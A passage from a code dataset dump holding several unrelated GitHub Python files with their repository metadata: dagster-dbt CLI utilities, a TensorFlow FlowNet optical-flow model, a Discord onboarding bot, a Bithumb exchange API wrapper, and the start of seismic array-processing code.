Mapping[str, Any],\n log: Any,\n warn_error: bool,\n ignore_handled_error: bool,\n json_log_format: bool = True,\n capture_logs: bool = True,\n debug: bool = False,\n) -> Iterator[DbtCliEvent]:\n \"\"\"Executes a command on the dbt CLI in a subprocess.\"\"\"\n command_list = _create_command_list(\n executable=executable,\n warn_error=warn_error,\n json_log_format=json_log_format,\n command=command,\n flags_dict=flags_dict,\n debug=debug,\n )\n log.info(f\"Executing command: {' '.join(command_list)}\")\n\n for event in _core_execute_cli(\n command_list=command_list,\n json_log_format=json_log_format,\n ignore_handled_error=ignore_handled_error,\n project_dir=flags_dict[\"project-dir\"],\n ):\n if isinstance(event, int):\n return_code = event\n log.info(f\"dbt exited with return code {return_code}\")\n break\n\n yield event\n if capture_logs:\n log.log(event.log_level, event.message)\n\n\ndef execute_cli(\n executable: str,\n command: str,\n flags_dict: Mapping[str, Any],\n log: Any,\n warn_error: bool,\n ignore_handled_error: bool,\n target_path: str,\n docs_url: Optional[str] = None,\n json_log_format: bool = True,\n capture_logs: bool = True,\n debug: bool = False,\n) -> DbtCliOutput:\n \"\"\"Executes a command on the dbt CLI in a subprocess.\"\"\"\n check.str_param(executable, \"executable\")\n check.str_param(command, \"command\")\n check.mapping_param(flags_dict, \"flags_dict\", key_type=str)\n check.bool_param(warn_error, \"warn_error\")\n check.bool_param(ignore_handled_error, \"ignore_handled_error\")\n\n command_list = _create_command_list(\n executable=executable,\n warn_error=warn_error,\n json_log_format=json_log_format,\n command=command,\n flags_dict=flags_dict,\n debug=debug,\n )\n log.info(f\"Executing command: {' '.join(command_list)}\")\n\n return_code = 0\n lines, parsed_json_lines = [], []\n for event in _core_execute_cli(\n command_list=command_list,\n json_log_format=json_log_format,\n ignore_handled_error=ignore_handled_error,\n project_dir=flags_dict[\"project-dir\"],\n ):\n if isinstance(event, int):\n return_code = event\n log.info(f\"dbt exited with return code {return_code}\")\n break\n\n if event.line is not None:\n lines.append(event.line)\n if event.parsed_json_line is not None:\n parsed_json_lines.append(event.parsed_json_line)\n\n if 
capture_logs:\n log.log(event.log_level, event.message)\n\n run_results = (\n parse_run_results(flags_dict[\"project-dir\"], target_path)\n if command in DBT_RUN_RESULTS_COMMANDS\n else {}\n )\n\n return DbtCliOutput(\n command=\" \".join(command_list),\n return_code=return_code,\n raw_output=\"\\n\\n\".join(lines),\n logs=parsed_json_lines,\n result=run_results,\n docs_url=docs_url,\n )\n\n\ndef parse_run_results(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH) -> Mapping[str, Any]:\n \"\"\"Parses the `target/run_results.json` artifact that is produced by a dbt process.\"\"\"\n run_results_path = os.path.join(path, target_path, \"run_results.json\")\n try:\n with open(run_results_path, encoding=\"utf8\") as file:\n return json.load(file)\n except FileNotFoundError:\n raise DagsterDbtCliOutputsNotFoundError(path=run_results_path)\n\n\ndef remove_run_results(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH):\n \"\"\"Parses the `target/run_results.json` artifact that is produced by a dbt process.\"\"\"\n run_results_path = os.path.join(path, target_path, \"run_results.json\")\n if os.path.exists(run_results_path):\n os.remove(run_results_path)\n\n\ndef parse_manifest(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH) -> Mapping[str, Any]:\n \"\"\"Parses the `target/manifest.json` artifact that is produced by a dbt process.\"\"\"\n manifest_path = os.path.join(path, target_path, \"manifest.json\")\n try:\n with open(manifest_path, encoding=\"utf8\") as file:\n return json.load(file)\n except FileNotFoundError:\n raise DagsterDbtCliOutputsNotFoundError(path=manifest_path)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"18138310815","text":"import tensorflow as tf\nimport argparse\nimport yaml\nfrom tensorflow.python.ops.init_ops import Initializer\nimport numpy as np\nfrom tools.DataInputCylindrical import predict_input_fn, input_fn\nfrom hooks.Hooks import SaveTrainableParamsCount\nfrom tools.PlotDirectionalField import directionalFieldTF\nfrom flownet_ops.op_correlation import correlation\n\n\nclass LoadInitializer(Initializer):\n\n def __init__(self, dtype=tf.float32, name=''):\n self.dtype = tf.as_dtype(dtype)\n self.filename = '/home/klein/U/extracted_weights/flownet_c/' + name + '.npy'\n\n def __call__(self, shape, dtype=None, partition_info=None):\n if dtype is None:\n dtype = self.dtype\n\n data = np.load(self.filename)\n tensor = tf.reshape(tf.convert_to_tensor(data, dtype=dtype), shape)\n\n return tensor\n\n def get_config(self):\n return {\"dtype\": self.dtype.name}\n \n\ndef conv(a, filters, name, kernel_size=1, strides=1, activation=None, fr=False, reuse=None):\n if activation is None: activation = tf.nn.leaky_relu\n if fr:\n return tf.layers.conv2d(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, reuse=reuse, kernel_initializer=LoadInitializer(name=name+'_weights'), bias_initializer=LoadInitializer(name=name+'_biases'))\n else:\n return tf.layers.conv2d(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, reuse=reuse)\n\n\ndef deconv(a, filters, name=None, kernel_size=1, strides=1, activation=None, fr=False):\n if activation is None: activation = tf.nn.leaky_relu\n if fr:\n return 
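The flag handling in build_command_args_from_flags is worth pinning down with a concrete illustration (the flag names and values below are made up, assuming the module above is importable): booleans become bare flags, lists are splatted after their flag, dicts are JSON-encoded, and falsy values are dropped entirely.

# Illustration of build_command_args_from_flags with hypothetical flags:
args = build_command_args_from_flags({
    "project-dir": ".",
    "select": ["orders", "customers"],          # list -> flag then each item
    "full-refresh": True,                       # bool -> bare flag
    "vars": {"start_date": "2023-01-01"},       # dict -> JSON string
    "threads": None,                            # falsy -> omitted
})
assert args == [
    "--project-dir", ".",
    "--select", "orders", "customers",
    "--full-refresh",
    "--vars", '{"start_date": "2023-01-01"}',
]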
tf.layers.conv2d_transpose(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, kernel_initializer=LoadInitializer(name=name+'_weights'), bias_initializer=LoadInitializer(name=name+'_biases'))\n else:\n return tf.layers.conv2d_transpose(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation)\n\n\ndef model_fn(features, labels, mode, params):\n firstrun = params['FIRSTRUN']\n\n # resizing:\n features = tf.image.resize_images(features, [64, 1024])\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = tf.image.resize_images(labels, [64, 1024])\n\n labels = labels[:,:,:,0:2]\n\n image_a = features[:,:,:,0:3]\n image_b = features[:,:,:,3:6]\n\n conv_a_1 = conv(image_a, filters=64, kernel_size=7, strides=2, fr=firstrun, name='conv1')\n conv_a_2 = conv(conv_a_1, filters=128, kernel_size=5, strides=2, fr=firstrun, name='conv2')\n conv_a_3 = conv(conv_a_2, filters=256, kernel_size=5, strides=2, fr=firstrun, name='conv3')\n\n conv_b_1 = conv(image_b, filters=64, kernel_size=7, strides=2, fr=firstrun, name='conv1', activation=tf.nn.relu, reuse=True)\n conv_b_2 = conv(conv_b_1, filters=128, kernel_size=5, strides=2, fr=firstrun, name='conv2', activation=tf.nn.relu, reuse=True)\n conv_b_3 = conv(conv_b_2, filters=256, kernel_size=5, strides=2, fr=firstrun, name='conv3', activation=tf.nn.relu, reuse=True)\n\n cc = correlation(conv_a_3, conv_b_3, 1, 20, 1, 2, 20)\n cc_relu = tf.nn.relu(cc)\n netA_conv = conv(conv_a_3, filters=32, kernel_size=1, fr=firstrun, name='conv_redir')\n net = tf.concat([netA_conv, cc_relu], axis=3)\n\n conv3_1 = conv(net, filters=256, kernel_size=3, strides=1, fr=firstrun, name='conv3_1')\n\n conv4 = conv(conv3_1, filters=512, kernel_size=3, strides=2, fr=firstrun, name='conv4')\n conv4_1 = conv(conv4, filters=512, kernel_size=3, strides=1, fr=firstrun, name='conv4_1')\n\n conv5 = conv(conv4_1, filters=512, kernel_size=3, strides=2, fr=firstrun, name='conv5')\n conv5_1 = conv(conv5, filters=512, kernel_size=3, strides=1, fr=firstrun, name='conv5_1')\n\n conv6 = conv(conv5_1, filters=1024, kernel_size=3, strides=2, fr=firstrun, name='conv6')\n conv6_1 = conv(conv6, filters=1024, kernel_size=3, strides=1, fr=firstrun, name='conv6_1')\n\n # refinement\n predict_6 = conv(conv6_1, filters=2, kernel_size=3, fr=firstrun, name='predict_flow6')\n deconv5 = deconv(conv6_1, filters=512, kernel_size=4, strides=2, fr=firstrun, name='deconv5')\n upsample_6to5 = deconv(predict_6, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow6to5')\n concat5 = tf.concat([conv5_1, deconv5, upsample_6to5], axis=3, name='concat_1')\n\n predict_5 = conv(concat5, filters=2, kernel_size=3, fr=firstrun, name='predict_flow5')\n deconv4 = deconv(concat5, filters=256, kernel_size=4, strides=2, fr=firstrun, name='deconv4')\n upsample_5to4 = deconv(predict_5, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow5to4')\n concat4 = tf.concat([conv4_1, deconv4, upsample_5to4], axis=3, name='concat_2')\n\n predict_4 = conv(concat4, filters=2, kernel_size=3, fr=firstrun, name='predict_flow4')\n deconv3 = deconv(concat4, filters=128, kernel_size=4, strides=2, fr=firstrun, name='deconv3')\n upsample_4to3 = deconv(predict_4, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow4to3')\n concat3 = tf.concat([conv3_1, deconv3, upsample_4to3], axis=3, name='concat_3')\n\n predict_3 = conv(concat3, filters=2, 
kernel_size=3, fr=firstrun, name='predict_flow3')\n deconv2 = deconv(concat3, filters=64, kernel_size=4, strides=2, fr=firstrun, name='deconv2')\n upsample_3to2 = deconv(predict_3, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow3to2')\n concat2 = tf.concat([conv_a_2, deconv2, upsample_3to2], axis=3, name='concat_4')\n\n predict_2 = conv(concat2, filters=2, kernel_size=3, fr=firstrun, name='predict_flow2') # no pretrained weights available because we want 3d-flow\n\n x = predict_2 * 20.0\n x = tf.image.resize_bilinear(x, [64, 1024], align_corners=True)\n\n # for prediction only:\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions={\"predictions\": x})\n\n labels = labels * 0.05\n\n if params['LOSS'] == 'special':\n losses = []\n\n # L2 loss between predict_flow6, blob23 (weighted w/ 0.32)\n size = [predict_6.shape[1], predict_6.shape[2]]\n downsampled_flow6 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow6, predict_6))\n\n # L2 loss between predict_flow5, blob28 (weighted w/ 0.08)\n size = [predict_5.shape[1], predict_5.shape[2]]\n downsampled_flow5 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow5, predict_5))\n\n # L2 loss between predict_flow4, blob33 (weighted w/ 0.02)\n size = [predict_4.shape[1], predict_4.shape[2]]\n downsampled_flow4 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow4, predict_4))\n\n # L2 loss between predict_flow3, blob38 (weighted w/ 0.01)\n size = [predict_3.shape[1], predict_3.shape[2]]\n downsampled_flow3 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow3, predict_3))\n\n # L2 loss between predict_flow2, blob43 (weighted w/ 0.005)\n size = [predict_2.shape[1], predict_2.shape[2]]\n downsampled_flow2 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow2, predict_2))\n\n loss = tf.losses.compute_weighted_loss(losses, [0.32, 0.08, 0.02, 0.01, 0.005])\n else :\n # calculate loss:\n mask = tf.stack([features[:, :, :, 0], features[:, :, :, 0]], axis=3)\n weight_matrix = tf.where(tf.abs(mask) < 0.001, tf.ones_like(mask), tf.ones_like(mask)*params['LOSS_WEIGHT_OCCUPIED'])\n\n loss = tf.losses.mean_squared_error(labels, x, weight_matrix)\n\n # output end point error as evaluation metric\n firstlayer = labels[:, :, :, 0]\n bool_mask = tf.layers.flatten(tf.where(tf.abs(firstlayer) < 0.01, tf.zeros_like(firstlayer, dtype=tf.bool), tf.ones_like(firstlayer, dtype=tf.bool)))\n epe = tf.reduce_mean(tf.boolean_mask(tf.layers.flatten(tf.norm(labels - x, ord='euclidean', axis=3)), bool_mask))\n tf.summary.scalar('epe', epe)\n\n overall_epe = tf.reduce_mean(tf.norm(labels - x, ord='euclidean', axis=3))\n tf.summary.scalar('overall_epe', overall_epe)\n\n # image output\n tf.summary.image('output', tf.expand_dims(directionalFieldTF(x[0,:,:,0],x[0,:,:,1],1.8),0))\n tf.summary.image('groundtruth', tf.expand_dims(directionalFieldTF(20.0*labels[0,:,:,0],20.0*labels[0,:,:,1],1.8),0))\n\n # metrics for evaluation\n eval_metrics = {\n 'epe':tf.metrics.mean_absolute_error(0.0, epe)\n }\n\n # solver\n global_step = tf.train.get_global_step()\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(learning_rate=params['LEARNING_RATE'])\n train_op = 
optimizer.minimize(loss=loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n eval_metric_ops=eval_metrics)\n\n\ndef main(args):\n import os\n\n # load config file:\n with open(args.parameters, 'r') as stream:\n try:\n cfg = yaml.load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n return\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=cfg['GPU_FRACTION'])\n session_config = tf.ConfigProto(gpu_options=gpu_options)\n config = tf.estimator.RunConfig()\n config = config.replace(session_config=session_config)\n config = config.replace(model_dir=cfg['MODEL_DIR'])\n config = config.replace(save_summary_steps=cfg['SUMMARY_STEPS'])\n config = config.replace(save_checkpoints_secs=cfg['CHECKPOINTS_SECS'])\n\n if os.path.exists(cfg['MODEL_DIR']):\n cfg.update({'FIRSTRUN': False})\n else:\n cfg.update({'FIRSTRUN': True})\n\n nn = tf.estimator.Estimator(model_fn=model_fn, params=cfg, config=config)\n\n if not args.inference:\n # first run to load pretrained weights\n if cfg['FIRSTRUN']:\n nn.train(input_fn=lambda: input_fn(cfg['BATCH_SIZE'], cfg['TRAIN_DATA_LOCATION']),\n hooks=[SaveTrainableParamsCount(cfg['MODEL_DIR'])], steps=1)\n\n cfg.update({'FIRSTRUN': False})\n nn = tf.estimator.Estimator(model_fn=model_fn, params=cfg, config=config)\n\n for x in range(cfg['NUM_EPOCHS']):\n nn.train(input_fn=lambda:input_fn(cfg['BATCH_SIZE'], cfg['TRAIN_DATA_LOCATION']))\n nn.evaluate(input_fn=lambda:input_fn(cfg['BATCH_SIZE'], cfg['EVAL_DATA_LOCATION']), steps=int(cfg['EVAL_EXAMPLES']/cfg['BATCH_SIZE']))\n else:\n import os\n\n if args.output != '':\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n with open(cfg['EVAL_DATA_LOCATION'], 'r') as f:\n slice_data = [line.strip() for line in f]\n\n predictions = nn.predict(input_fn=lambda: predict_input_fn(slice_data))\n for i,p in enumerate(predictions):\n prediction = p['predictions']\n data = slice_data[i].split(',')\n if args.output == '':\n print(prediction)\n input()\n else:\n # write to output dir:\n print('Writing estimation',i+1,'of',len(slice_data))\n np.save(args.output + '/' + str(i).zfill(3) + '_estimation', np.array(prediction))\n\n return\n\n\nif __name__ == \"__main__\":\n tf.logging.set_verbosity(tf.logging.INFO)\n\n parser = argparse.ArgumentParser(description='Neural Network')\n parser.add_argument('-p', '--parameters', help='Yaml parameter file to be used')\n parser.add_argument('-i', '--inference', help='Set this for prediciton, omit for learning.', action='store_true')\n parser.add_argument('-o', '--output', help='If set, this is the output folder for prediction.', default='')\n\n main(parser.parse_args())\n","repo_name":"zhangqiuhao/Unsupervised_flow","sub_path":"Python/FlowNet/FlowNet_C_2D.py","file_name":"FlowNet_C_2D.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34908534820","text":"import os\nfrom dotenv import load_dotenv\n\nimport asyncio\n\nimport dhooks_lite\n\nimport lightbulb\nfrom hikari import Intents, Embed, events, errors\n\n\nload_dotenv()\n\nif os.name != \"nt\":\n import uvloop\n uvloop.install()\n\nbot = lightbulb.Bot(\n token=os.getenv(\"DISCORD_BOT_TOKEN\"),\n prefix=\"^\",\n intents=Intents.ALL,\n logs={\n \"version\": 1,\n \"incremental\": True,\n \"loggers\": {\n \"hikari\": {\"level\": \"INFO\"},\n \"hikari.ratelimits\": {\"level\": \"TRACE_HIKARI\"},\n \"lightbulb\": {\"level\": \"INFO\"},\n }\n 
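# For reference, the masked endpoint error (EPE) that FlowNet's model_fn reports
# has a direct NumPy analogue. This sketch mirrors the mask-on-the-first-channel
# convention used above; the array shapes and values are made up.
import numpy as np

def masked_epe(pred, gt, eps=0.01):
    # pred, gt: flow fields of shape (H, W, 2)
    mask = np.abs(gt[..., 0]) >= eps              # ignore empty ground-truth cells
    err = np.linalg.norm(gt - pred, axis=-1)      # per-pixel Euclidean error
    return err[mask].mean() if mask.any() else 0.0

pred = np.zeros((4, 4, 2))
gt = np.ones((4, 4, 2))
print(masked_epe(pred, gt))  # sqrt(2) ~= 1.414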
}\n)\n\n\n@bot.command()\nasync def ping(ctx):\n await ctx.respond(\"Pong!\")\n\n\nclass WelcomePlugin(lightbulb.Plugin):\n\n def __init__(self, bot):\n super().__init__()\n self.bot = bot\n self.log_channel_hook = dhooks_lite.Webhook(os.getenv(\"LOG_CHANNEL_WEBHOOK_LINK\"))\n self.questions = [\n {\n \"title\": \"How would you like to be addressed?\",\n \"sub\": \"What name(s) and pronouns would you like us to use?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"Why did you come to the TEC?\",\n \"options\": [\n \"[Curious] - I’m curious to learn more about TEC in general\",\n \"[Future Contributor] - I’d like to contribute to building or improving the TEC\",\n \"[Proposals] - I’d like to submit a proposal in order to receive TEC funding\",\n \"[Partnerships] - I want to build a partnership between my DAO and the TEC\",\n \"[Education] - I want to learn more about Web3, DAOs, and/or Token Engineering\",\n \"[Other] - [Long Answer Text Box]\"\n ],\n \"emojis\": [\n '🤔',\n '🛠️',\n '📜',\n '🤝',\n '📚',\n '➕'\n ],\n \"type\": \"choice\"\n },\n {\n \"title\": \"How familiar are you with web3?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"How did you find out about the TEC?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"Which timezone are you in?\",\n \"type\": \"text\"\n }\n ]\n\n async def form_runner(self, member):\n try:\n details = []\n\n for ques in self.questions:\n if ques['type'] == 'text':\n await member.send(\n Embed(\n title=ques['title'],\n description=ques['sub'] if 'sub' in ques else None,\n color=0xdefb48\n )\n )\n response = await self.bot.wait_for(\n events.DMMessageCreateEvent,\n 180.0,\n lambda event: event.author.id == member.id\n )\n details.append(response.message.content)\n elif ques['type'] == 'choice':\n msg = await member.send(\n Embed(\n title=ques['title'],\n description=\"React with an emoji to make your choice for this question:\\n\\n\" + '\\n'.join([f\"{ques['emojis'][i]} {ques['options'][i]}\" for i in range(len(ques['options']))]),\n color=0xdefb48\n )\n )\n\n for emoji in ques['emojis']:\n await msg.add_reaction(emoji)\n\n content = \"\"\n\n try:\n reaction = await self.bot.wait_for(\n events.DMReactionAddEvent,\n 180.0,\n lambda event: (event.user_id == member.id) and (event.emoji_name in ques['emojis'])\n )\n content += [ques[\"options\"][i] for i in range(len(ques['options'])) if ques['emojis'][i] == reaction.emoji_name][0]\n if reaction.emoji_name == emoji[-1]:\n await member.send(Embed(description=\"You can enter a more detailed description in a message below...\"))\n response = await self.bot.wait_for(\n events.DMMessageCreateEvent,\n 180.0,\n lambda event: event.author_id == member.id\n )\n content += f'\\n{response.message.content}'\n\n details.append(content)\n except asyncio.TimeoutError:\n for emoji in ques['emojis']:\n await msg.remove_reaction(\n emoji,\n user=self.bot.get_me()\n )\n\n else:\n await member.send(\"Something's wrong... Oh no!\")\n\n\n def get_field(i):\n title = self.questions[i].get('title')\n sub = self.questions[i].get('sub')\n\n title = '' if not title else title\n sub = '' if not sub else sub\n return f\"**{title + ' - ' + sub}**\\n{details[i]}\"\n\n self.log_channel_hook.execute(\n embeds=[dhooks_lite.Embed(\n title=f\"{member} joined the server!\",\n description=\"\\n\\n\".join(\n [f\"{get_field(i)}\" for i in range(len(details))]\n ),\n color=0xdefb48\n )]\n )\n\n\n await member.send(\n Embed(\n description=\"Thanks for filling out this form! 
To continue your journey, visit the #your-guide channel...\",\n color=0x00ff00\n )\n )\n\n except asyncio.TimeoutError:\n await member.send(\n Embed(\n description=\"That form timed out, to fill the same, use the command- `^welcome` and follow the instructions.\",\n color=0xff0000\n )\n )\n\n\n\n async def greeting(self, member):\n try:\n msg = await member.send(\n Embed(\n title=\"Welcome to the TEC!\",\n description=\"It would be great if you could share some more info with us by filling a small form. To start filling it react to this mesage with a 📝\",\n color=0xdefb48\n )\n )\n await msg.add_reaction('📝')\n\n try:\n reaction = await self.bot.wait_for(\n events.DMReactionAddEvent,\n 180.0,\n lambda event: event.user_id == member.id\n )\n await self.form_runner(member)\n except asyncio.TimeoutError:\n await msg.remove_reaction(\n '📝',\n user=self.bot.get_me()\n )\n await member.send(\n Embed(\n description=\"That form timed out, to fill the same, use the command- `^welcome` and follow the instructions.\",\n color=0xff0000\n )\n )\n except errors.ForbiddenError:\n await self.log_channel_hook.execute(\n embeds=[Embed(\n description=f\"Error: Couldn't send DM to {member.mention}\",\n color=0xff0000\n )]\n )\n\n @lightbulb.dm_only()\n @lightbulb.command()\n async def welcome(self, ctx):\n await self.greeting(ctx.author)\n\n @lightbulb.plugins.listener(events.MemberCreateEvent)\n async def send_greetings(self, event):\n try:\n print(f\"{event.member} entered the server...\")\n \"\"\"\n self.add_data(\n str(event.member.id),\n event.member.username + '#' + event.member.discriminator\n )\n \"\"\"\n except Exception as e:\n await event.member.send(f\"Error -\\n{e}\")\n print(e)\n await self.greeting(event.member)\n\n\nbot.add_plugin(WelcomePlugin(bot))\nbot.run()\n","repo_name":"Vyvy-vi/TEC-welcome-bot","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41348870952","text":"import logging\nfrom exchange.errors import *\nfrom exchange.ticker import Ticker\nfrom exchange.orderbook import *\nfrom exchange.currency_pair import CurrencyPair\nfrom exchange.exchange_base import ExchangeBase\nfrom exchange.bithumb.bithumb import Bithumb\n\n\nclass ExchangeBithumb(ExchangeBase):\n \"\"\"\n Bithumb\n \"\"\"\n NAME = 'Bithumb'\n VERSION = 'Unknown'\n URL = 'https://www.bithumb.com/u1/US127'\n\n def __init__(self):\n super().__init__(self.NAME, self.VERSION, self.URL)\n self.bithumb = Bithumb()\n\n def get_currency_pairs(self):\n '''\n Gets currency list supported by exchange\n :return: supported currency pair list\n :rtype: CurrencyPair[]\n '''\n currency_pairs = []\n ticker_all = self.bithumb.ticker('ALL')\n if int(ticker_all['status']) != 0:\n raise Exception('ticker() failed(%s)' % ticker_all['status'])\n for key in ticker_all['data'].keys():\n if key == 'date':\n continue\n currency_pairs.append(CurrencyPair(\"KRW\", key.upper()))\n return currency_pairs\n\n def get_ticker(self, currency_pair):\n '''\n Gets last price\n :param CurrencyPair currency_pair: currency pair\n :return: ticker\n :rtype: Ticker\n '''\n if currency_pair is None:\n raise InvalidParamException('currency_pair is None')\n if currency_pair.market_currency != 'KRW':\n raise InvalidParamException('invalid market_currency')\n ticker = self.bithumb.ticker(currency_pair.currency)\n if int(ticker['status']) != 0:\n raise Exception('ticker() failed(%s)' % ticker['status'])\n price = 
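# The ask-a-question flow in WelcomePlugin repeats one pattern: send an Embed,
# then wait_for a DM event from the same member with a timeout. A hypothetical
# helper in the same style; Embed, events, and asyncio are assumed to come from
# the module's existing imports, and the positional wait_for call simply mirrors
# the plugin's own usage.
async def ask_text(bot, member, prompt, timeout=180.0):
    # Returns the member's reply text, or None on timeout.
    await member.send(Embed(title=prompt, color=0xdefb48))
    try:
        event = await bot.wait_for(
            events.DMMessageCreateEvent,
            timeout,
            lambda e: e.author_id == member.id,
        )
        return event.message.content
    except asyncio.TimeoutError:
        return None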
float(ticker['data']['closing_price'])\n timestamp = int(ticker['data']['date'])\n return Ticker(currency_pair, price, timestamp)\n\n def get_orderbook(self, currency_pair):\n '''\n Gets orderbook information\n :param CurrencyPair currency_pair: currency pair\n :return: orderbook\n :rtype: Orderbook\n '''\n if currency_pair is None:\n raise InvalidParamException('currency_pair is None')\n if currency_pair.market_currency != 'KRW':\n raise InvalidParamException('invalid market_currency')\n orderbook = self.bithumb.orderbook(currency_pair.currency)\n if int(orderbook['status']) != 0:\n raise Exception('orderbook() failed(%s)' % orderbook['status'])\n\n timestamp = orderbook['data']['timestamp']\n asks = []\n for unit in orderbook['data']['asks']:\n price = float(unit['price'])\n amount = float(unit['quantity'])\n asks.append(OrderbookItem(price, amount))\n\n bids = []\n for unit in orderbook['data']['bids']:\n price = float(unit['price'])\n amount = float(unit['quantity'])\n bids.append(OrderbookItem(price, amount))\n\n return Orderbook(currency_pair, asks, bids, timestamp)\n","repo_name":"inasie/pyexchange","sub_path":"exchange/bithumb/exchange_bithumb.py","file_name":"exchange_bithumb.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"75115491687","text":"import os\nimport sys\nimport math\nfrom math import radians, cos, sin, atan2\nimport logging\nfrom obspy.core.utcdatetime import UTCDateTime\nfrom palantiri.common import Basic, Globals, Logfile, DataTypes\nfrom palantiri.common.DataTypes import Location\nfrom palantiri.common.ObspyFkt import loc2degrees\nfrom palantiri.common.ConfigFile import ConfigObj, OriginCfg, SynthCfg\nimport time\nimport numpy as num\nfrom collections import OrderedDict, defaultdict\nfrom pyrocko.gf import ws, LocalEngine, Target, DCSource, RectangularSource\nfrom pyrocko import util, pile, model, catalog, gf, cake, io, trace\nfrom pyrocko.guts import Object, String, Float, List\nfrom palantiri.process.semp import otest\nfrom palantiri.process.beam_stack import BeamForming\nfrom pyrocko.gf import STF\nfrom palantiri.process.stacking import PWS_stack\nfrom palantiri.process import sembCalc\nfrom palantiri.process import ttt, waveform, sembCalc, trigger\nfrom palantiri.tools import config\nfrom palantiri.process.array_crosscorrelation_v4 import Xcorr, cmpFilterMetavsXCORR, getArrayShiftValue\nimport cPickle as pickle\nimport times\n\nkm = 1000.\n\n\nlogger = logging.getLogger('ARRAY-MP')\n\n\nclass CombiSource(gf.Source):\n '''Composite source model.'''\n\n discretized_source_class = gf.DiscretizedMTSource\n\n subsources = List.T(gf.Source.T())\n\n def __init__(self, subsources=[], **kwargs):\n if subsources:\n\n lats = num.array(\n [subsource.lat for subsource in subsources], dtype=num.float)\n lons = num.array(\n [subsource.lon for subsource in subsources], dtype=num.float)\n\n assert num.all(lats == lats[0]) and num.all(lons == lons[0])\n lat, lon = lats[0], lons[0]\n\n # if not same use:\n # lat, lon = center_latlon(subsources)\n\n depth = float(num.mean([p.depth for p in subsources]))\n t = float(num.mean([p.time for p in subsources]))\n kwargs.update(time=t, lat=float(lat), lon=float(lon), depth=depth)\n\n gf.Source.__init__(self, subsources=subsources, **kwargs)\n\n def get_factor(self):\n return 1.0\n\n def discretize_basesource(self, store, target=None):\n\n dsources = []\n t0 = self.subsources[0].time\n for sf in self.subsources:\n assert t0 == 
sf.time\n ds = sf.discretize_basesource(store, target)\n ds.m6s *= sf.get_factor()\n dsources.append(ds)\n\n return gf.DiscretizedMTSource.combine(dsources)\n\n\n\n\nclass CakeTiming(Object):\n '''Calculates and caches phase arrivals.\n :param fallback_time: returned, when no phase arrival was found for the\n given depth-distance-phase-selection-combination\n\n E.g.:\n definition = 'first(p,P)-20'\n CakeTiming(definition)'''\n phase_selection = String.T()\n fallback_time = Float.T(optional=True)\n\n def __init__(self, phase_selection, fallback_time=None):\n self.arrivals = defaultdict(dict)\n self.fallback_time = fallback_time\n self.which = None\n self.phase_selection = phase_selection\n _phase_selection = phase_selection\n if '+' in _phase_selection:\n _phase_selection, self.offset = _phase_selection.split('+')\n self.offset = float(self.offset)\n elif '-' in _phase_selection:\n _phase_selection, self.offset = _phase_selection.split('-')\n self.offset = float(self.offset)\n self.offset = -self.offset\n\n if 'first' in _phase_selection:\n self.which = 'first'\n if 'last' in _phase_selection:\n self.which = 'last'\n if self.which:\n _phase_selection = self.strip(_phase_selection)\n\n self.phases = _phase_selection.split('|')\n\n def return_time(self, ray):\n if ray is None:\n return self.fallback_time\n else:\n return ray.t + self.offset\n\n def t(self, mod, z_dist, get_ray=False):\n ''':param phase_selection: phase names speparated by vertical bars\n :param z_dist: tuple with (depth, distance)\n '''\n z, dist = z_dist\n if (dist, z) in self.arrivals.keys():\n return self.return_time(self.arrivals[(dist, z)])\n\n phases = [cake.PhaseDef(pid) for pid in self.phases]\n arrivals = mod.arrivals(\n distances=[dist*cake.m2d], phases=phases, zstart=z)\n if arrivals == []:\n logger.warn(\n 'no phase at d=%s, z=%s. 
